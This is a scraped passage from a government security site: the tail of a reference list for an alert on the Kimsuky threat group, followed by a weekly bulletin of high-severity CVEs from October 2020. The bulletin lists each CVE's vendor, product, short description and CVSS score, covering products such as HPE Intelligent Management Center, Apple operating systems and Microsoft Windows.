href=”https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/”>[30] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[31] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[32] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”route:<nolink>”>[33] Private Sector Partner</a></li> <li><a href=”route:<nolink>”>[34] Private Sector Partner</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[35] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>[36] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs</a></li> <li><a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>[37] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[38] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[39] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[40] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[41] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[42] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[43] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://www.mcafee.com/blogs/other-blogs/mcafee-labs/what-is-mshta-how-can-it-be-used-and-how-to-protect-against-it/”>[44] McAfee: What is mshta, how can it be used and how to protect against it</a></li> <li><a href=”https://www.securityweek.com/north-korea-suspected-cyber-espionage-attacks-against-south-korean-entities”>[45] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[46] Securelist: The “Kimsuky” Operation: A North Korean APT?</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[47] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://www.microsoft.com/security/blog/2019/05/09/detecting-credential-theft-through-memory-access-modelling-with-microsoft-defender-atp/”>[48] Detecting credential theft through memory access modelling with Microsoft Defender ATP</a></li> <li><a href=”https://attack.mitre.org/groups/G0094/”>[49] MITRE ATT&CK: Groups – Kimsuky</a></li> <li><a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>[50] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims</a></li> <li><a href=”https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/”>[51] ZDNet: Cyber-espionage-group-uses-chrome-extension-to-infect-victims</a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[52] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>[53] Netscout: Stolen Pencil Campaign Targets Academia </a></li> <li><a href=”route:<nolink>”>[54] Private Sector Partner</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[55] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[56] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href=”route:<nolink>”>[57] Private Sector Partner</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[58] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> <li><a href=”route:<nolink>”>[59] Private Sector Partner</a></li> <li><a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>[60] Securelist: The “Kimsuky” Operation: A North Korean APT? </a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 27, 2020: Initial Version</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy &amp; Use</a> policy.</p>

</div>

Categories
alerts

Vulnerability Summary for the Week of October 19, 2020

Original release date: October 26, 2020

The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
acronis — cyber_backup Acronis Cyber Backup 12.5 and Cyber Protect 15 include an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory within C:jenkins_agent. Acronis Cyber Backup and Cyber Protect contain a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges. 2020-10-21 7.2 CVE-2020-10138
MISC
acronis — true_image Acronis True Image 2021 includes an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory within C:jenkins_agent. Acronis True Image contains a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges. 2020-10-21 7.2 CVE-2020-10139
MISC
adobe — animate Adobe Animate version 20.5 (and earlier) is affected by an out-of-bounds read vulnerability, which could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate. 2020-10-21 9.3 CVE-2020-9750
MISC
adobe — animate Adobe Animate version 20.5 (and earlier) is affected by an out-of-bounds read vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate. 2020-10-21 9.3 CVE-2020-9749
MISC
adobe — animate Adobe Animate version 20.5 (and earlier) is affected by a double free vulnerability when parsing a crafted .fla file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-21 9.3 CVE-2020-9747
MISC
apple — icloud A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 7.5 CVE-2020-9895
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — ipad_os An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.0 and iPadOS 14.0. An application may be able to cause unexpected system termination or write kernel memory. 2020-10-16 9.3 CVE-2020-9958
MISC
apple — ipad_os A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-16 9.3 CVE-2020-9923
MISC
MISC
apple — ipad_os A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An application may be able to execute arbitrary code with kernel privileges. 2020-10-16 9.3 CVE-2020-9907
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. 2020-10-16 10 CVE-2020-9918
MISC
MISC
MISC
MISC
apple — mac_os_x A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-16 10 CVE-2020-9864
MISC
apple — mac_os_x An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges. 2020-10-16 9.3 CVE-2020-9799
MISC
apple — xcode This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network. 2020-10-16 9.3 CVE-2020-9992
MISC
MISC
cisco — firepower_threat_defense A vulnerability in the SSL/TLS inspection of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series firewalls could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper input validation for certain fields of specific SSL/TLS messages. An attacker could exploit this vulnerability by sending a malformed SSL/TLS message through an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. No manual intervention is needed to recover the device after it has reloaded. 2020-10-21 7.1 CVE-2020-3562
CISCO
cisco — firepower_threat_defense A vulnerability in the ICMP ingress packet processing of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 4110 appliances could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to incomplete input validation upon receiving ICMP packets. An attacker could exploit this vulnerability by sending a high number of crafted ICMP or ICMPv6 packets to an affected device. A successful exploit could allow the attacker to cause a memory exhaustion condition that may result in an unexpected reload. No manual intervention is needed to recover the device after the reload. 2020-10-21 7.8 CVE-2020-3571
CISCO
cisco — firepower_threat_defense A vulnerability in the packet processing functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to inefficient memory management. An attacker could exploit this vulnerability by sending a large number of TCP packets to a specific port on an affected device. A successful exploit could allow the attacker to exhaust system memory, which could cause the device to reload unexpectedly. No manual intervention is needed to recover the device after it has reloaded. 2020-10-21 7.8 CVE-2020-3563
CISCO
hp — intelligent_management_center A selectusergroup expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7168
MISC
hp — intelligent_management_center A reportpage index expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7187
MISC
hp — intelligent_management_center A powershellconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7186
MISC
hp — intelligent_management_center A faultdevparasset expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7143
MISC
hp — intelligent_management_center A viewtaskresultdetailfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7176
MISC
hp — intelligent_management_center A ifviewselectpage expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7154
MISC
hp — intelligent_management_center A selviewnavcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7157
MISC
hp — intelligent_management_center A iccselectdeviceseries expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7160
MISC
hp — intelligent_management_center A reporttaskselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7161
MISC
hp — intelligent_management_center A operatorgroupselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7162
MISC
hp — intelligent_management_center A navigationto expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7163
MISC
hp — intelligent_management_center A operationselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7164
MISC
hp — intelligent_management_center A iccselectcommand expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7165
MISC
hp — intelligent_management_center A quicktemplateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7167
MISC
hp — intelligent_management_center A faultinfo_content expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7156
MISC
hp — intelligent_management_center A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7169
MISC
hp — intelligent_management_center A select expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7170
MISC
hp — intelligent_management_center A guidatadetail expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7171
MISC
hp — intelligent_management_center A templateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7172
MISC
hp — intelligent_management_center A devgroupselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7146
MISC
hp — intelligent_management_center A perfselecttask expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7158
MISC
hp — intelligent_management_center A chooseperfview expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7145
MISC
hp — intelligent_management_center A faultflasheventselectfact expression language injectionremote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7189
MISC
hp — intelligent_management_center A select expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7155
MISC
hp — intelligent_management_center A iccselectdevtype expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7153
MISC
hp — intelligent_management_center A faultparasset expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7152
MISC
hp — intelligent_management_center A faulttrapgroupselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7151
MISC
hp — intelligent_management_center A faultstatchoosefaulttype expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7150
MISC
hp — intelligent_management_center A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7149
MISC
hp — intelligent_management_center A customtemplateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7159
MISC
hp — intelligent_management_center A userselectpagingcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7188
MISC
hp — intelligent_management_center A operatorgrouptreeselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7166
MISC
hp — intelligent_management_center A deviceselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7190
MISC
hp — intelligent_management_center A addvsiinterfaceinfo expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24652
MISC
hp — intelligent_management_center A deployselectbootrom expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7147
MISC
hp — intelligent_management_center A iccselectdymicparam expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7175
MISC
hp — intelligent_management_center A smsrulesdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7181
MISC
hp — intelligent_management_center A ictexpertdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7180
MISC
hp — intelligent_management_center A thirdpartyperfselecttask expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7179
MISC
hp — intelligent_management_center A mediaforaction expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7178
MISC
hp — intelligent_management_center A wmiconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7177
MISC
hp — intelligent_management_center A deployselectsoftware expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7148
MISC
hp — intelligent_management_center A soapconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7174
MISC
hp — intelligent_management_center A forwardredirect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7183
MISC
hp — intelligent_management_center A actionselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7173
MISC
hp — intelligent_management_center A remote operatoronlinelist_content privilege escalation vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-24630
MISC
hp — intelligent_management_center A devsoftsel expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7191
MISC
hp — intelligent_management_center A syslogtempletselectwin expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24651
MISC
hp — intelligent_management_center A legend expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24650
MISC
hp — intelligent_management_center A adddevicetoview expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7141
MISC
hp — intelligent_management_center A accessmgrservlet classname deserialization of untrusted data remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24648
MISC
hp — intelligent_management_center A devicethresholdconfig expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7192
MISC
hp — intelligent_management_center A tvxlanlegend expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7185
MISC
hp — intelligent_management_center A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7193
MISC
hp — intelligent_management_center A iccselectrules expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7195
MISC
hp — intelligent_management_center A eventinfo_content expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7142
MISC
hp — intelligent_management_center A remote bytemessageresource transformentity” input validation code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24649
MISC
hp — intelligent_management_center A remote accessmgrservlet classname input validation code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24647
MISC
hp — intelligent_management_center A tftpserver stack-based buffer overflow remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24646
MISC
hp — intelligent_management_center A remote urlaccesscontroller authentication bypass vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24629
MISC
hp — intelligent_management_center A perfaddormoddevicemonitor expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7194
MISC
hp — intelligent_management_center A comparefilesresult expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7144
MISC
hp — intelligent_management_center A viewbatchtaskresultdetailfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7184
MISC
hp — intelligent_management_center A sshconfig expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7182
MISC
jetbrains — youtrack In JetBrains YouTrack before 2020.2.10514, SSRF is possible because URL filtering can be escaped. 2020-10-19 7.5 CVE-2020-15822
MISC
CONFIRM
loginizer — loginizer The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip. 2020-10-21 7.5 CVE-2020-27615
MISC
MISC
MISC
MISC
microsoft — 365_apps A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-17003. 2020-10-16 9.3 CVE-2020-16918
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16947
MISC
MISC
MISC
microsoft — 365_apps A remote code execution vulnerability exists when the Microsoft Office Access Connectivity Engine improperly handles objects in memory, aka ‘Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16957
MISC
microsoft — 3d_viewer A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory.An attacker who successfully exploited the vulnerability would gain execution on a victim system.The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory., aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16918. 2020-10-16 9.3 CVE-2020-17003
MISC
microsoft — network_watcher_agent An elevation of privilege vulnerability exists in Network Watcher Agent virtual machine extension for Linux, aka ‘Network Watcher Agent Virtual Machine Extension for Linux Elevation of Privilege Vulnerability’. 2020-10-16 7.2 CVE-2020-16995
MISC
microsoft — powershellget A security feature bypass vulnerability exists in the PowerShellGet V2 module, aka ‘PowerShellGet Module WDAC Security Feature Bypass Vulnerability’. 2020-10-16 7.2 CVE-2020-16886
MISC
microsoft — visual_studio_code A remote code execution vulnerability exists in Visual Studio Code when a user is tricked into opening a malicious ‘package.json’ file, aka ‘Visual Studio JSON Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-17023
MISC
microsoft — visual_studio_code A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads a Jupyter notebook file, aka ‘Visual Studio Code Python Extension Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16977
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16907. 2020-10-16 7.2 CVE-2020-16913
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows Setup in the way it handles directories.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Setup Elevation of Privilege Vulnerability’. 2020-10-16 7.2 CVE-2020-16908
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16913. 2020-10-16 7.2 CVE-2020-16907
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash, aka ‘Windows Error Reporting Manager Elevation of Privilege Vulnerability’. 2020-10-16 7.2 CVE-2020-16895
MISC
microsoft — windows_10 A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka ‘Windows Hyper-V Remote Code Execution Vulnerability’. 2020-10-16 7.2 CVE-2020-16891
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16968. 2020-10-16 9.3 CVE-2020-16967
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16923. 2020-10-16 9.3 CVE-2020-1167
MISC
MISC
microsoft — windows_10 A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Denial of Service Vulnerability’. 2020-10-16 7.8 CVE-2020-16899
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory, aka ‘GDI+ Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16911
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1047. 2020-10-16 7.2 CVE-2020-1080
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1080. 2020-10-16 7.2 CVE-2020-1047
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16967. 2020-10-16 9.3 CVE-2020-16968
MISC
MISC
microsoft — windows_10 A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability’. 2020-10-16 7.8 CVE-2020-16927
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka ‘Jet Database Engine Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16924
MISC
